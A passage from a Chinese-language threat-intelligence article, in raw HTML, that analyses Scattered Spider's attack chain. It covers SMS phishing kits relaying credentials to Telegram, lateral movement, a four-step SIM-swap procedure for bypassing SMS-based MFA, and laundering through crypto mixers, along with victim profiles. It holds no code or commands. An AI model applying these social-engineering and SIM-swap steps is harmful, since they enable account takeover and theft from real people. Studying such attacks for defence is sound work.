48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">美国（北卡罗来纳）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">起诉在审</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">-</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击链深度解析：从凭证窃取到加密货币洗劫</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Scattered Spider组织已形成一套成熟且高度自动化的攻击框架。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第一阶段：短信钓鱼（SMS Phishing）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者向受害企业员工批量发送钓鱼短信，内容通常伪装成企业VPN异常、账户安全警告或密码过期提醒。原文披露的攻击手法显示，Buchanan及其同谋向目标公司员工发送</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">数百条</span></strong><span leaf="">钓鱼短信，链接指向精心设计的钓鱼页面。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这些钓鱼页面高度模仿企业登录门户，包括伪造的合法品牌界面、SSL证书（部分情况下）以及与真实网站相似的域名。钓鱼工具包自动捕获员工输入的凭证，并实时传输至攻击者控制的Telegram频道。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">技术特征：</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">使用多域名部署钓鱼基础设施，避免单点失效</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">Telegram频道作为数据中转站，降低被发现概率</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">针对不同目标定制钓鱼内容，提高可信度</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第二阶段：凭证利用与横向移动</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">获取初始凭证后，攻击者快速识别可利用的账户，特别是具有高权限的管理账户。通过合法的VPN通道访问企业网络后，攻击者在内网进行侦察，识别关键资产和敏感数据存储位置。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这一阶段的目标不仅限于加密货币钱包，还包括：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">知识产权和商业机密</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">员工个人身份信息（PII）</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">其他系统登录凭证</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">内部机密文档和通信记录</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第三阶段：SIM卡交换攻击——绕过MFA的关键</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">SIM卡交换攻击是该组织攻击链的核心环节。当受害者的加密货币交易所账户或钱包启用了基于短信的双因素认证时，攻击者通过以下流程实现账户劫持：</span></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">信息收集<span textstyle="" style="font-weight: normal;">：通过第一阶段窃取的PII确定受害者身份信息、手机号码运营商</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">社工联络<span textstyle="" style="font-weight: normal;">：冒充受害者致电运营商客服，请求将号码转移至攻击者控制的SIM卡</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">验证码拦截<span textstyle="" style="font-weight: normal;">：成功换卡后，所有短信验证码发送至攻击者设备</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">账户清空<span textstyle="" style="font-weight: normal;">：使用拦截的验证码完成认证，重置钱包密码，转走所有资产</span></span></strong></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">原文披露，执法部门在Buchanan的苏格兰住所发现的设备中包含</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">多名受害者的姓名和地址信息</span></strong><span leaf="">，以及</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加密货币种子短语文件</span></strong><span leaf="">，直接证明其对SIM交换攻击的深度参与。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第四阶段：混币与变现</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">窃取的加密货币通过多层混币服务转移，攻击者精心设计交易路径以逃避区块链分析追踪。最终资金通过场外交易（OTC）或暗网市场转换为法币。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">受害者画像与行业分布</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据多方信息交叉验证，Scattered Spider的攻击活动在2021年9月至2023年4月期间达到高峰，受害企业涵盖多个关键行业：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">行业</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">代表性受害者</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击影响</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">酒店与娱乐</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">MGM Resorts、Caesars</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">系统瘫痪、数据泄露</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">科技</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Twilio、GitHub、Cloudflare</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">员工凭证泄露</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通信</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Mailchimp</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">用户数据外泄</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">零售</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">DoorDash、英国/美国零售企业</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">客户信息泄露</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">加密货币</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">虚拟货币服务商</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数百万美元损失</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组织对MGM Resorts的攻击尤为引人注目。2023年9月，攻击者通过社工手段获取内部系统访问权限，导致赌场预订系统、酒店管理系统和忠诚度计划平台全面瘫痪，直接损失超过1亿美元。这一事件充分展示了Scattered Spider从凭证窃取到大规模企业入侵的能力跃升。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">战术技术演变趋势：从&#34;0ktapus&#34;到专业攻击组织</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">分析发现，Scattered Spider的攻击能力经历了明显演进轨迹。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">起源：0ktapus钓鱼攻击（2022年）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组织最初以&#34;0ktapus&#34;名称活动，主要针对多因素认证（MFA）服务商发起钓鱼攻击。通过克隆Okta登录页面，该组织窃取了大量企业员工的SSO凭证。这一阶段的攻击手法相对简单，以大规模钓鱼为主。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">成熟期：多向量社工攻击（2022-2023年）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">随着攻击经验积累，Scattered Spider开始采用更复杂的社会工程策略：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: 